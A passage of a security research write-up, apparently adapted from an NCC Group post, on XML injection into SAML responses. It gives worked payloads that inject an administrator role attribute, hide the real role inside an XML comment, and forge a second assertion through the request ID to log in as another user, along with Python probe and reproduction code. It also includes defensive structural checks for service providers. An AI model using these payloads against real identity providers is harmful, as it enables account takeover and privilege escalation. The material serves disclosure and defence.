<samlp:AuthnRequest AssertionConsumerServiceURL="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/generic-saml-localhost" Destination="http://127.0.0.1:8080/samlp" ID="_0699a57c1e6ac6afc3c2d7ab8cc56dec61cb09b672" IssueInstant="2021-02-11T18:51:31Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
<saml:Issuer>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/generic-saml-localhost/&lt;ncc-test&gt;test&lt;/ncc-test&gt;</saml:Issuer>
<samlp:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>
</samlp:AuthnRequest>
This request produced the following Audience element in the SAML assertion:
<saml:AudienceRestriction>
<saml:Audience>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/generic-saml-localhost/<ncc-test>test</ncc-test></saml:Audience>
</saml:AudienceRestriction>
For user attributes, the success of injecting XML characters into the SAML assertion will depend on how these attributes are updated and stored by the identity provider; if XSS defenses prevent users from storing characters such as angle brackets in their attributes, it may not be possible to perform the attack. In the following example, setting the user’s name to “Adam</saml:AttributeValue><ncc-test>aaaa</ncc-test><saml:AttributeValue>” produced the following Attribute element in the assertion. In this particular case, it was necessary to close the saml:AttributeValue element and create a new AttributeValue element to pass XML validation performed by the server:
<saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">Adam</saml:AttributeValue>
<ncc-test>aaaa</ncc-test>
<saml:AttributeValue/>
</saml:Attribute>
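The two halves of this procedure, the encoded probe on the attacker's side and the template-versus-library distinction on the identity provider's side, can be put together in a few dozen lines. The following is an added example written for this page in Python's standard library; it is not code from the original post, nor from any identity provider NCC Group assessed. It models a hypothetical identity provider in two ways (a string-template builder of the kind described above, and the same document built with ElementTree, which escapes attribute values), crafts the attribute and element probes by setting the AuthnRequest ID through ElementTree so that the &quot;/&lt;/&gt; encoding is emitted automatically, and classifies what came back. The request, the hostnames and the response shape are constructed for the example.

```python
import xml.etree.ElementTree as ET

SAMLP = "urn:oasis:names:tc:SAML:2.0:protocol"
SAML = "urn:oasis:names:tc:SAML:2.0:assertion"
ET.register_namespace("samlp", SAMLP)
ET.register_namespace("saml", SAML)

# ---- Hypothetical identity provider (constructed for this example) ----

def idp_response_template(request_id, name_id):
    """Vulnerable: the request ID and NameID are concatenated into a string template."""
    return (
        f'<samlp:Response xmlns:samlp="{SAMLP}" xmlns:saml="{SAML}" ID="_resp1" '
        f'Version="2.0" InResponseTo="{request_id}">'
        f'<saml:Assertion ID="_a1" Version="2.0"><saml:Subject>'
        f'<saml:NameID>{name_id}</saml:NameID>'
        f'<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">'
        f'<saml:SubjectConfirmationData InResponseTo="{request_id}"/>'
        f'</saml:SubjectConfirmation></saml:Subject></saml:Assertion></samlp:Response>'
    )

def idp_response_tree(request_id, name_id):
    """Hardened: the same document built as a tree; the serialiser escapes attribute values and text."""
    resp = ET.Element(f"{{{SAMLP}}}Response", ID="_resp1", Version="2.0", InResponseTo=request_id)
    assertion = ET.SubElement(resp, f"{{{SAML}}}Assertion", ID="_a1", Version="2.0")
    subject = ET.SubElement(assertion, f"{{{SAML}}}Subject")
    ET.SubElement(subject, f"{{{SAML}}}NameID").text = name_id
    conf = ET.SubElement(subject, f"{{{SAML}}}SubjectConfirmation",
                         Method="urn:oasis:names:tc:SAML:2.0:cm:bearer")
    ET.SubElement(conf, f"{{{SAML}}}SubjectConfirmationData", InResponseTo=request_id)
    return ET.tostring(resp, encoding="unicode")

def idp_read_request_id(authn_request_xml):
    """What the IdP sees: the parser has already turned &quot; &lt; &gt; back into the raw characters."""
    return ET.fromstring(authn_request_xml).get("ID")

# ---- Attacker side ----

ATTR_PROBE = '" ncctest="BBBB'                               # break out of ID, add a marker attribute
ELEM_PROBE = '" ncctest="BBBB"><ncc-elem attribute="aaaa'   # also close the start tag, add a marker element

BASE_REQUEST = (  # constructed AuthnRequest, modelled on the one in the post
    f'<samlp:AuthnRequest xmlns:samlp="{SAMLP}" xmlns:saml="{SAML}" ID="_3af7aba0" Version="2.0" '
    'IssueInstant="2021-02-08T22:39:58Z" Destination="http://adam.local:8080/SSOService">'
    '<saml:Issuer>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/default-sp</saml:Issuer>'
    '</samlp:AuthnRequest>'
)

def craft_probe(base_request, probe):
    """Append the probe to the request ID; ElementTree entity-encodes it so the request stays well-formed."""
    root = ET.fromstring(base_request)
    root.set("ID", root.get("ID") + probe)
    return ET.tostring(root, encoding="unicode")

def classify_response(response_xml, marker="ncctest"):
    """Work out from the IdP's response what happened to the probe."""
    try:
        root = ET.fromstring(response_xml)
    except ET.ParseError:
        return "malformed"            # reflected raw but left unbalanced markup: injection, but the payload needs tidying
    if any(el.tag == "ncc-elem" for el in root.iter()):
        return "element-injected"
    if any(marker in el.attrib for el in root.iter()):
        return "attribute-injected"
    if any(marker in v for el in root.iter() for v in el.attrib.values()):
        return "reflected-encoded"    # the value came back, but the IdP escaped it
    return "not-reflected"

def run_probe(idp_builder, probe):
    """End to end: craft the request, let the IdP parse it and build its response, classify the result."""
    request_id = idp_read_request_id(craft_probe(BASE_REQUEST, probe))
    return classify_response(idp_builder(request_id, "alice@example.com"))
```

Against the template builder the attribute probe classifies as attribute-injected, while the element probe leaves an unclosed ncc-elem and an unclosed SubjectConfirmationData and so yields a malformed response; this is the tolerance-to-invalid-XML point made later in the post, and the reason the post's element payload pairs its new element with an attribute to balance the template's quotes. Against the tree builder both probes come back reflected-encoded: the payload is in the InResponseTo value, but as text.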
Exploiting the Vulnerability
Identifying SAML XML injection vulnerabilities is fairly straightforward, but exploiting them is another story. Success will depend on a multitude of factors, including where the injection points occur, how tolerant of invalid XML the libraries used to sign and parse the SAML response are, and whether the service provider will trust the injected payload. In fact, in some cases where XML injection was possible on the identity provider, a number of service providers rejected or ignored the modified payload, not because the signature was invalid but because of repeated elements in the document.
The nature of this vulnerability will mean that, in many cases, it is necessary to inject repeated elements or to construct entirely new assertions. Problems encountered as a consequence of this include:
- The service provider may select the original legitimate element (assertion or NameID) created by the identity provider, rather than the injected element. XML libraries differ in which occurrence they return when an element is repeated in a document; typically it is either the first or the last.
- Some security conscious service providers may reject responses containing repeated elements altogether; there is generally no good reason for an assertion to contain two NameID elements, for example.
- The attack may also fail if the service provider includes defenses against XML Signature Wrapping (XSW)*. This is a well-documented SAML vulnerability, where an attacker modifies the structure of a SAML response in an attempt to trick the service provider into reading the user’s identity from an unsigned element (e.g. by adding a second unsigned assertion to a SAML response, before the legitimate signed assertion). Although an XML injection attack means that both assertions are included in the scope of the SAML response signature, the mere presence of a second assertion element can be enough for some service providers to reject the message.
* For a good overview of XML Signature Wrapping attacks, see On Breaking SAML: Be Whoever You Want to Be.
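The three points above are, from the service provider's side, the structural checks that should run before any element is picked out of a response and before the signature is even verified. The following is an added example, not code from the post and not from any service provider library, that implements those checks with Python's standard library and runs them over three constructed responses: a clean one, one with a duplicated role attribute, and one shaped like the InResponseTo injection shown later in this post (two top-level assertions, a nested copy inside SubjectConfirmationData, a stray elem element and a duplicated ID). The Signature elements are structural stubs carrying only the Reference URI; real signature verification is out of scope here. The name_ids helper also shows why "first or last" matters: in the injected layout the forged NameID is both.

```python
import xml.etree.ElementTree as ET
from collections import Counter

SAMLP = "urn:oasis:names:tc:SAML:2.0:protocol"
SAML = "urn:oasis:names:tc:SAML:2.0:assertion"
DS = "http://www.w3.org/2000/09/xmldsig#"
ALLOWED_NS = {SAMLP, SAML, DS}   # element namespaces a plain signed response is expected to use

def namespace_of(tag):
    return tag[1:].split("}", 1)[0] if tag.startswith("{") else ""

def name_ids(response_xml):
    """All NameID values in document order; find() would give the first, findall()[-1] the last."""
    root = ET.fromstring(response_xml)
    return [el.text for el in root.iter(f"{{{SAML}}}NameID")]

def structural_problems(response_xml):
    """Reasons to reject the response before signature or attribute processing (empty list = clean)."""
    root = ET.fromstring(response_xml)
    problems = []
    top = root.findall(f"{{{SAML}}}Assertion")
    total = len(list(root.iter(f"{{{SAML}}}Assertion")))
    if len(top) != 1 or total != 1:
        problems.append(f"expected one Assertion directly under Response, found {len(top)} there and {total} in total")
    for local in ("Subject", "NameID"):
        n = len(list(root.iter(f"{{{SAML}}}{local}")))
        if n != 1:
            problems.append(f"expected one {local}, found {n}")
    for name, n in Counter(a.get("Name") for a in root.iter(f"{{{SAML}}}Attribute")).items():
        if n > 1:
            problems.append(f"Attribute {name!r} repeated {n} times")
    for el in root.iter():
        if namespace_of(el.tag) not in ALLOWED_NS:
            problems.append(f"unexpected element {el.tag!r}")
    for value, n in Counter(el.get("ID") for el in root.iter() if el.get("ID") is not None).items():
        if n > 1:
            problems.append(f"ID {value!r} used {n} times")
    # XSW guard: every Signature must reference the ID of the element that encloses it
    for parent in root.iter():
        for sig in parent.findall(f"{{{DS}}}Signature"):
            ref = sig.find(f"{{{DS}}}SignedInfo/{{{DS}}}Reference")
            uri = ref.get("URI") if ref is not None else None
            if uri != "#" + (parent.get("ID") or ""):
                problems.append(f"Signature reference {uri!r} does not cover its parent element")
    return problems

# Constructed samples (signature stubs only; no real crypto).
GOOD = f'''<samlp:Response xmlns:samlp="{SAMLP}" xmlns:saml="{SAML}" xmlns:ds="{DS}" ID="_r1" Version="2.0" InResponseTo="_q1">
  <saml:Issuer>http://idp.example</saml:Issuer>
  <ds:Signature><ds:SignedInfo><ds:Reference URI="#_r1"/></ds:SignedInfo></ds:Signature>
  <samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status>
  <saml:Assertion ID="_a1" Version="2.0">
    <saml:Issuer>http://idp.example</saml:Issuer>
    <saml:Subject><saml:NameID>alice@example.com</saml:NameID></saml:Subject>
    <saml:AttributeStatement>
      <saml:Attribute Name="role"><saml:AttributeValue>viewer</saml:AttributeValue></saml:Attribute>
    </saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>'''

DUP_ROLE = GOOD.replace(
    '<saml:Attribute Name="role">',
    '<saml:Attribute Name="role"><saml:AttributeValue>administrator</saml:AttributeValue></saml:Attribute>'
    '<saml:Attribute Name="role">')

INJECTED = f'''<samlp:Response xmlns:samlp="{SAMLP}" xmlns:saml="{SAML}" xmlns:ds="{DS}" ID="_r2" Version="2.0" InResponseTo="_q1">
  <saml:Issuer>http://idp.example</saml:Issuer>
  <ds:Signature><ds:SignedInfo><ds:Reference URI="#_r2"/></ds:SignedInfo></ds:Signature>
  <samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status>
  <saml:Assertion ID="_a1" Version="2.0">
    <saml:Subject><saml:NameID>victim@example.com</saml:NameID></saml:Subject>
  </saml:Assertion>
  <elem test=""/>
  <saml:Assertion ID="_a2" Version="2.0">
    <saml:Subject>
      <saml:NameID>attacker@example.com</saml:NameID>
      <saml:SubjectConfirmation><saml:SubjectConfirmationData InResponseTo="_q1">
        <saml:Assertion ID="_a1" Version="2.0"><saml:Subject><saml:NameID>victim@example.com</saml:NameID></saml:Subject></saml:Assertion>
      </saml:SubjectConfirmationData></saml:SubjectConfirmation>
    </saml:Subject>
  </saml:Assertion>
</samlp:Response>'''
```

A service provider that takes the first or the last NameID from INJECTED authenticates the victim either way; the legitimate assertion sits in the middle. The checks fire on the assertion count, the Subject and NameID counts, the foreign elem element and the reused ID, each of which is independent of whether the signature over the whole response verifies (it would).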
Example Exploits
In assessments performed by NCC Group, this vulnerability was most commonly exploitable in two scenarios:
- Attribute injections, where the injection occurs in a SAML attribute associated with the account in the identity provider.
- InResponseTo injections, where the injection affects the InResponseTo attribute of the SAML response.
Example exploits for these two scenarios are provided in the following sections. As it would be impossible to demonstrate all possible XML injection attacks on SAML implementations in this blog post, hopefully these can provide some inspiration. The techniques outlined here can likely be adapted to exploit identity providers affected by this vulnerability in most configurations.
Disclaimer: These examples were reproduced in a local environment specifically built to be vulnerable to this attack.
Attribute Injections
In addition to the NameID (which is the unique identifier for the user), SAML responses can include a set of user attributes that may be useful to the service provider. These are optional and there are no particular requirements; typically they are used to send data such as the user’s name, email address, and phone number. Some service providers also use the attributes to dictate the privileges that should be assigned to the user post-authentication, using a role attribute or similar. Therefore, if these attributes are not appropriately encoded, an attacker could inject or modify attributes to escalate their privileges or otherwise gain access to sensitive data in the service provider.
As an example, suppose the SAML assertion contains an AttributeStatement such as the following, which includes two attributes: one for the user’s full name and another for the user’s role (viewer):
<saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi:type="xs:string">Adam Roberts</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi:type="xs:string">viewer</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>
The attacker could change their name in the identity provider to the following value:
Adam Roberts</saml:AttributeValue></saml:Attribute><saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">administrator
If the identity provider includes this value in the name attribute without appropriate validation, the following AttributeStatement will be sent to the service provider. This may allow the attacker to authenticate to the application under the context of an “administrator”, rather than a “viewer”:
<saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi:type="xs:string">Adam Roberts</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi:type="xs:string">administrator</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi:type="xs:string">viewer</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>
Note that the “role” Attribute element is repeated, and it is therefore possible that the attack may fail if the service provider reads the second role attribute value, or if a validator rejects the assertion. If the attacker controls two attributes (e.g. the name and an email address), it may be possible to use XML comments to effectively delete the role attribute generated by the identity provider. Take the following AttributeStatement as an example. This includes the user’s email address, the role, and a name attribute:
<saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Attribute Name="email" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi:type="xs:string">[email protected]</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi:type="xs:string">viewer</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi:type="xs:string">Adam Roberts</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>
The role attribute is included between the email and name attributes. An attacker could set their email address and name to the following values:
email: [email protected]</saml:AttributeValue></saml:Attribute><saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">administrator</saml:AttributeValue></saml:Attribute><!--
name: --><saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">Adam Roberts
When the AttributeStatement element is built by the identity provider, the following XML will be produced, where the “viewer” role attribute is enclosed within an XML comment:
<saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Attribute Name="email" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi:type="xs:string">[email protected]</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi:type="xs:string">administrator</saml:AttributeValue>
</saml:Attribute>
<!--</saml:AttributeValue></saml:Attribute><saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">viewer</saml:AttributeValue></saml:Attribute><saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">-->
<saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi:type="xs:string">Adam Roberts</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>
When parsed by the service provider, the user will be authenticated to the application under the context of an administrator.
Comments can be a useful tool when exploiting XML injections in SAML messages. When done correctly, it is often possible to control large parts of the SAML response or assertion, which makes them particularly effective in subverting restrictions imposed by strict service providers. It is worth noting that the XML signature schemes used by SAML implementations canonicalize the document prior to calculating the signature, and the canonicalization algorithms normally chosen (such as Exclusive XML Canonicalization, http://www.w3.org/2001/10/xml-exc-c14n#, used in the responses shown in this post) omit comments; only the #WithComments variants of these algorithms retain them. In other words, comments in a SAML response are usually not considered when the signature is calculated, and can therefore be removed entirely before submission to the service provider without invalidating it. If it is possible to inject XML into two locations within a SAML response, the opportunities for exploitation are much greater through the use of XML comments.
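As an added example that is not part of the original post, the following Python reproduces the two-attribute comment trick above against a hypothetical template-based identity provider and then checks the canonicalization claim using the standard library's C14N 2.0 implementation (xml.etree.ElementTree.canonicalize, Python 3.8 or later). Like the Exclusive C14N 1.0 algorithm used in the responses in this post, it omits comments unless explicitly asked to keep them, so the canonical form of the injected statement is byte-for-byte the same as the canonical form of the statement with the comment deleted. The template, the attribute values and the email address are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

SAML = "urn:oasis:names:tc:SAML:2.0:assertion"
NS = {"saml": SAML}
BASIC = "urn:oasis:names:tc:SAML:2.0:attrname-format:basic"

# Hypothetical vulnerable IdP template (constructed): stored profile values are dropped straight into the markup.
TEMPLATE = (
    f'<saml:AttributeStatement xmlns:saml="{SAML}" xmlns:xs="http://www.w3.org/2001/XMLSchema" '
    'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
    f'<saml:Attribute Name="email" NameFormat="{BASIC}"><saml:AttributeValue xsi:type="xs:string">{{email}}</saml:AttributeValue></saml:Attribute>'
    f'<saml:Attribute Name="role" NameFormat="{BASIC}"><saml:AttributeValue xsi:type="xs:string">{{role}}</saml:AttributeValue></saml:Attribute>'
    f'<saml:Attribute Name="name" NameFormat="{BASIC}"><saml:AttributeValue xsi:type="xs:string">{{name}}</saml:AttributeValue></saml:Attribute>'
    '</saml:AttributeStatement>'
)

def build_statement(email, role, name):
    """The IdP's (vulnerable) AttributeStatement builder: plain string substitution."""
    return TEMPLATE.format(email=email, role=role, name=name)

def attacker_values():
    """Email closes its own value, injects an administrator role and opens a comment;
    name closes the comment and reopens the name Attribute so the template's closing tags still match."""
    email = ('attacker@example.com</saml:AttributeValue></saml:Attribute>'
             f'<saml:Attribute Name="role" NameFormat="{BASIC}"><saml:AttributeValue xsi:type="xs:string">'
             'administrator</saml:AttributeValue></saml:Attribute><!--')
    name = (f'--><saml:Attribute Name="name" NameFormat="{BASIC}">'
            '<saml:AttributeValue xsi:type="xs:string">Adam Roberts')
    return email, name

def roles(statement_xml):
    """Role values as a service provider parsing the statement would see them (comments are not nodes)."""
    root = ET.fromstring(statement_xml)
    return [v.text for a in root.findall("saml:Attribute", NS) if a.get("Name") == "role"
            for v in a.findall("saml:AttributeValue", NS)]

def strip_comments(xml_text):
    """Remove every comment textually, as an attacker would before forwarding the response."""
    return re.sub(r"<!--.*?-->", "", xml_text, flags=re.S)

def canonical(xml_text, with_comments=False):
    """C14N 2.0 via the standard library; like exc-c14n it drops comments unless asked to keep them."""
    return ET.canonicalize(xml_text, with_comments=with_comments)
```

The signature input is canonical(injected); because that equals canonical(strip_comments(injected)), the forwarded response can omit the comment and its enclosed viewer role entirely and still verify.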
InResponseTo and Assertion Injections
Injections which affect the InResponseTo attribute occur when the SAML request ID is included unencoded within the response. As mentioned previously, the vast majority of SAML identity providers reflect the value of the SAML request ID in the response, and this is therefore considered a very reliable attribute to probe for injections. Exploiting this type of injection, however, can be extremely difficult. The primary reason is that the value is included in the SAML response in two locations: the InResponseTo attribute of the Response element, and the InResponseTo attribute of the SubjectConfirmationData element in the assertion. Whatever is injected therefore appears twice, once at the top level of the response and once inside the legitimate assertion’s Subject.
Below is an example of a SAML response generated by an identity provider (hosted on a local server) affected by this vulnerability. The InResponseTo attribute contains the value “_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46”, which was set by the service provider in the SAML request:
<?xml version="1.0" encoding="UTF-8"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_bb9456e6-ffbe-4117-94ca-1800923389b4" Version="2.0" IssueInstant="2021-02-12T00:18:22.727Z" Destination="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#_bb9456e6-ffbe-4117-94ca-1800923389b4">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
<ds:DigestValue>gj6oIvcJnXaTBtVRwyNVGaIwwEaCuO0jZizyG/Z94aU=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>ueEVB+Xt+kiZZ/g8+9LpO6IWevTatj0NnYLYUwcluqEGlYWMyXef5uQpWf89BO/j294jnIA9KifnqwvhZZr5Ma5e1UQ5/C5d3lTkSA8MTi3DZ8AuHmEtvnC83ivD9IJizcyr0KbwcHtJVzisvvYDwo/f5xq3IrFtqA18tL/mMVA=</ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate>...</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</ds:Signature>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_fa80f7dc-12d1-490c-b19f-c99773167f4b" Version="2.0" IssueInstant="2021-02-12T00:18:22.727Z">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData NotOnOrAfter="2021-02-12T00:23:22.727Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-02-12T00:18:22.727Z" NotOnOrAfter="2021-02-12T00:23:22.727Z">
<saml:AudienceRestriction>
<saml:Audience>http://sp.adam.local/</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-02-12T00:18:22.727Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
</samlp:Response>
The goal for most attackers here would be to inject a new assertion that includes a different NameID, and thereby gain access to another user’s account on the service provider. The following payload (decoded and formatted for readability), when included in the ID of the SAML request sent to the identity provider, achieves this.
_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46" NotOnOrAfter="2021-02-11T23:50:54.579Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-11T23:50:54.579Z">
<saml:AudienceRestriction>
<saml:Audience>http://sp.adam.local/</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
<elem test="
There are a few elements to this payload, explained below:
- First, "> is used to escape from the InResponseTo attribute value and close the start tag of the Response element, so that what follows is parsed as child elements.
- In the injected XML, copies of the Issuer and Status elements included in other responses observed from the identity provider are included.
- Then, an entirely new assertion is created, with a NameID which specifies the email address “[email protected]”. This assertion was built using assertions taken from legitimate responses generated by the server; the NameID field was modified, along with the NotOnOrAfter attributes (to specify a time in the future) and the InResponseTo attribute, to include the ID of the SAML request. Replacing these values ensures that the service provider will not reject the assertion, as it expects an assertion that has not expired and that was generated for the SAML request it previously issued.
- Finally, an unrelated element “elem” is opened at the end, with an attribute. This is designed to absorb the dangling markup left by the Response and SubjectConfirmationData elements created by the identity provider, where the injection points occur. Note, however, that this step is considered optional, and its necessity will depend on how tolerant the XML parser is. Some parsers will reject the XML document if the dangling markup is not part of an element, while others will simply treat the dangling markup as an additional text node. If the server rejects a payload that omits this element, try again with it included.
The following SAML request contains this payload, encoded for transport:
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46&quot;&gt;&lt;saml:Issuer&gt;http://idp.adam.local:8080&lt;/saml:Issuer&gt;&lt;samlp:Status&gt;&lt;samlp:StatusCode Value=&quot;urn:oasis:names:tc:SAML:2.0:status:Success&quot;/&gt;&lt;/samlp:Status&gt;&lt;saml:Assertion ID=&quot;_d0a71402-b0c1-453e-93bf-a3a43c50398b&quot; IssueInstant=&quot;2021-02-11T22:45:54.579Z&quot; Version=&quot;2.0&quot; xmlns:saml=&quot;urn:oasis:names:tc:SAML:2.0:assertion&quot; xmlns:xs=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;&gt;&lt;saml:Issuer&gt;http://idp.adam.local:8080&lt;/saml:Issuer&gt;&lt;saml:Subject&gt;&lt;saml:NameID Format=&quot;urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress&quot;&gt;[email protected]&lt;/saml:NameID&gt;&lt;saml:SubjectConfirmation Method=&quot;urn:oasis:names:tc:SAML:2.0:cm:bearer&quot;&gt;&lt;saml:SubjectConfirmationData InResponseTo=&quot;_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46&quot; NotOnOrAfter=&quot;2021-02-11T23:50:54.579Z&quot; Recipient=&quot;http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1&quot;/&gt;&lt;/saml:SubjectConfirmation&gt;&lt;/saml:Subject&gt;&lt;saml:Conditions NotBefore=&quot;2021-02-11T22:45:54.579Z&quot; NotOnOrAfter=&quot;2021-02-11T23:50:54.579Z&quot;&gt;&lt;saml:AudienceRestriction&gt;&lt;saml:Audience&gt;http://sp.adam.local/&lt;/saml:Audience&gt;&lt;/saml:AudienceRestriction&gt;&lt;/saml:Conditions&gt;&lt;saml:AuthnStatement 